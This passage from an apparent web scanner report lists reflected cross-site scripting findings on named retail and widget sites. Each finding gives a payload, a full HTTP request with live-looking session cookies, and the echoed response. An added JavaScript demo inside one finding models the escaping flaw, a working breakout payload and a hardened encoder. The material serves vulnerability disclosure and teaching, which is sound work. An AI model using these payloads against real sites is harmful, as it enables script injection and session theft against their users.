nguage="JavaScript" type="text/javascript">s.pageName = "PFC:Category:PBS";if ("Category" == "SEO-Local") {s.prop1 = "PFC:Category:SEO-";}else {s.prop1 = "PFC:Category:PBS";}s.eVar8 = "";if ("hmpg_podA1abf9\\";alert(1)//e408dc57373" != "") {s.eVar20 = "PFC_hmpg_podA1abf9\\";alert(1)//e408dc57373_";}</script>
...[SNIP]...

4.194. http://www.proflowers.com/mothers-day-flowers-MDF [tile parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /mothers-day-flowers-MDF

Issue detail

The value of the tile request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c36a\"%3balert(1)//decb137eb0b was submitted in the tile parameter. This input was echoed as 6c36a\\";alert(1)//decb137eb0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes; the backslash must be escaped before the quotation mark is, otherwise the quote-escaping step can be undone in exactly the way demonstrated above. Encoding every character outside a safe allowlist as a \uXXXX escape is the more robust option, since it also removes any literal </script> sequence from the output.

Request

GET /mothers-day-flowers-MDF?tile=hmpg_hero16c36a\"%3balert(1)//decb137eb0b&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.proflowers.com%25252Fmothers-day-flowers-MDF%25253Ftile%25253Dhmpg_hero1%252526Ref%25253DHomeNoRef%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:09 GMT
Content-Length: 255379


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
guage="JavaScript" type="text/javascript">s.pageName = "PFC:Category:MDF";if ("Category" == "SEO-Local") {s.prop1 = "PFC:Category:SEO-";}else {s.prop1 = "PFC:Category:MDF";}s.eVar8 = "";if ("hmpg_hero16c36a\\";alert(1)//decb137eb0b" != "") {s.eVar20 = "PFC_hmpg_hero16c36a\\";alert(1)//decb137eb0b_";}</script>
...[SNIP]...

4.195. http://www.proflowers.com/send-flowers-bsl [tile parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /send-flowers-bsl

Issue detail

The value of the tile request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22db9\"%3balert(1)//18210ad228e was submitted in the tile parameter. This input was echoed as 22db9\\";alert(1)//18210ad228e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes; the backslash must be escaped before the quotation mark is, otherwise the quote-escaping step can be undone in exactly the way demonstrated above. Encoding every character outside a safe allowlist as a \uXXXX escape is the more robust option, since it also removes any literal </script> sequence from the output.

Request

GET /send-flowers-bsl?tile=22db9\"%3balert(1)//18210ad228e&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM?0&5/9/2011 5:29:48 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:29:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:29:49 GMT
Content-Length: 247576


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
script language="JavaScript" type="text/javascript">s.pageName = "PFC:Category:bsl";if ("Category" == "SEO-Local") {s.prop1 = "PFC:Category:SEO-";}else {s.prop1 = "PFC:Category:bsl";}s.eVar8 = "";if ("22db9\\";alert(1)//18210ad228e" != "") {s.eVar20 = "PFC_22db9\\";alert(1)//18210ad228e_";}</script>
...[SNIP]...

4.196. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [PFC_BrowserId cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b4f5</script><script>alert(1)</script>3d893853418 was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
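The following is an added example, not code from this report or from any of the sites it lists. It models the two script-context flaws documented in the proflowers.com findings above: the filter that backslash-escapes a quotation mark but not a backslash (the tile, trackingpgroup and viewpos parameters) and the cookie value copied into a JavaScript string with no encoding at all (PFC_BrowserId), and it puts a \uXXXX-based encoder beside them. The page template, the function names and the payloads are constructed for the example; a tiny stand-in for the browser's script handling replaces a real DOM.

```javascript
// Added example, not code from the XSS.CX report or from any site it names.
// It reproduces the script-context flaws described in the findings above and
// shows an encoder that survives both. Names, template and payloads are
// constructed here, not taken from the applications.

// Flawed filter modelled on the report: only the double quote is escaped,
// so an attacker-supplied backslash swallows the one the filter adds.
function quoteOnlyEscape(value) {
  return value.replace(/"/g, '\\"');
}

// Hardened encoder for a double-quoted JavaScript string literal: every
// UTF-16 code unit outside a small allowlist becomes a \uXXXX escape. That
// covers backslash, both quote characters, < > / (so "</script>" can never
// appear in the output) and the line terminators U+2028/U+2029.
function jsStringEncode(value) {
  let out = '';
  for (let i = 0; i < value.length; i++) {
    const ch = value[i];
    if (/^[A-Za-z0-9 ,._:-]$/.test(ch)) {
      out += ch;
    } else {
      out += '\\u' + value.charCodeAt(i).toString(16).padStart(4, '0');
    }
  }
  return out;
}

// Emits the one-line analytics block seen in the category-page responses,
// with the tile value passed through the chosen escaper.
function renderTrackingScript(escaper, tile) {
  const v = escaper(tile);
  return '<script>s.eVar8 = "";if ("' + v + '" != "") ' +
         '{s.eVar20 = "PFC_' + v + '_";}</script>';
}

// Minimal stand-in for the browser: the HTML tokenizer ends a script element
// at the first "</script>" regardless of JavaScript syntax, and each element
// is compiled and run separately. Returns the tracking object, every value
// passed to alert(), and the name of any error an element raised.
function runPage(html) {
  const result = { s: {}, alerts: [], errors: [] };
  const scriptTag = /<script>([\s\S]*?)<\/script>/g;
  let m;
  while ((m = scriptTag.exec(html)) !== null) {
    try {
      new Function('s', 'alert', m[1])(result.s, (v) => result.alerts.push(v));
    } catch (e) {
      result.errors.push(e.name);
    }
  }
  return result;
}

// Constructed payloads. PROBE mirrors the scanner's \";alert(1)// pattern;
// BREAKOUT closes the if-condition it lands in so the block still parses;
// SCRIPT_TAGS is the cookie payload from the PFC_BrowserId findings.
const PROBE = 'hmpg_podA\\";alert(1)//';
const BREAKOUT = 'hmpg_podA\\"){alert(1)}//';
const SCRIPT_TAGS = '</script><script>alert(1)</script>';

function demo() {
  const escapers = [['quote-only', quoteOnlyEscape], ['encoded', jsStringEncode]];
  for (const [label, escaper] of escapers) {
    for (const payload of [PROBE, BREAKOUT, SCRIPT_TAGS]) {
      const r = runPage(renderTrackingScript(escaper, payload));
      console.log(label, JSON.stringify(payload), 'alerts=' + r.alerts.length,
                  'errors=' + r.errors.join(','), 'eVar20=' + JSON.stringify(r.s.eVar20));
    }
  }
}

demo();
```

Two things the run makes visible. First, the scanner's canned `\";alert(1)//` probe leaves the surrounding `if (` unbalanced, so against the quote-only filter the whole block fails to compile and nothing executes; a payload that closes the condition it lands in (the BREAKOUT value) runs the injected call, which is what turns the confirmed reflection into working script execution. Second, against the unencoded cookie value the `</script>` payload needs no quote handling at all, because the HTML tokenizer ends the script element before the JavaScript parser sees the string. The \uXXXX encoder neutralises both: the assigned value still round-trips to the original attacker string, but no quote, backslash or `<` ever reaches the source text.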

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a3b4f5</script><script>alert(1)</script>3d893853418; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:13:06 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:13:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:13:06 GMT
Content-Length: 143391


<noscript>
<div class="splashBox">
   <p>We’re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
=100000;
resx.event="Product";
resx.links="30050137;5519;42864;";
resx.itemid = "30050137";
resx.qty="1";
resx.price="49.98";
resx.total="";
resx.customerid="91621bab-4967-45f8-ad8e-98be730e6e4a3b4f5</script><script>alert(1)</script>3d893853418";
resx.transactionid = "";


resx.cv2 = "PFC";
resx.cv3 = "HPC";
resx.cv4 = "27";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx
...[SNIP]...

4.197. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [PFC_BrowserId cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa3cf</script><script>alert(1)</script>87e0272715b was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4afa3cf</script><script>alert(1)</script>87e0272715b; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:37:14 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:37:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:37:14 GMT
Content-Length: 138355


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...

resx.event="Product";
resx.links="30008396;5519;42864;30050137;";
resx.itemid = "30008396";
resx.qty="1";
resx.price="39.99";
resx.total="";
resx.customerid="91621bab-4967-45f8-ad8e-98be730e6e4afa3cf</script><script>alert(1)</script>87e0272715b";
resx.transactionid = "";


resx.cv2 = "PFC";
resx.cv3 = "PBS";
resx.cv4 = "27";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx
...[SNIP]...

4.198. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [PFC_BrowserId cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1aebe</script><script>alert(1)</script>f63217f9c47 was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a1aebe</script><script>alert(1)</script>f63217f9c47; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:29:34 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:29:34 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:29:34 GMT
Content-Length: 141286


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...

resx.event="Product";
resx.links="30003767;5519;42864;30050137;";
resx.itemid = "30003767";
resx.qty="1";
resx.price="49.98";
resx.total="";
resx.customerid="91621bab-4967-45f8-ad8e-98be730e6e4a1aebe</script><script>alert(1)</script>f63217f9c47";
resx.transactionid = "";


resx.cv2 = "PFC";
resx.cv3 = "PBS";
resx.cv4 = "27";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx
...[SNIP]...

4.199. http://seg.sharethis.com/getSegment.php [__stid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 5b716<script>alert(1)</script>eaf91aadd9b was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fww30.1800baskets.com%2Fproduct.do%3FbaseCode%3D93260%26dataset%3D11309&jsref=http%3A%2F%2Fww30.1800baskets.com%2Ftemplate.do%3Fid%3Dtemplate3%26page%3D2000&rnd=1304903453531 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==5b716<script>alert(1)</script>eaf91aadd9b; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Mon, 09 May 2011 01:18:10 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspT702sdV9LL0aNgCmJAg==5b716<script>alert(1)</script>eaf91aadd9b
userid:
</div>
...[SNIP]...

4.200. http://ww30.1800baskets.com/product.do [ShopperManagerEnterprise cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /product.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c266'-alert(1)-'ef80968ac09 was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

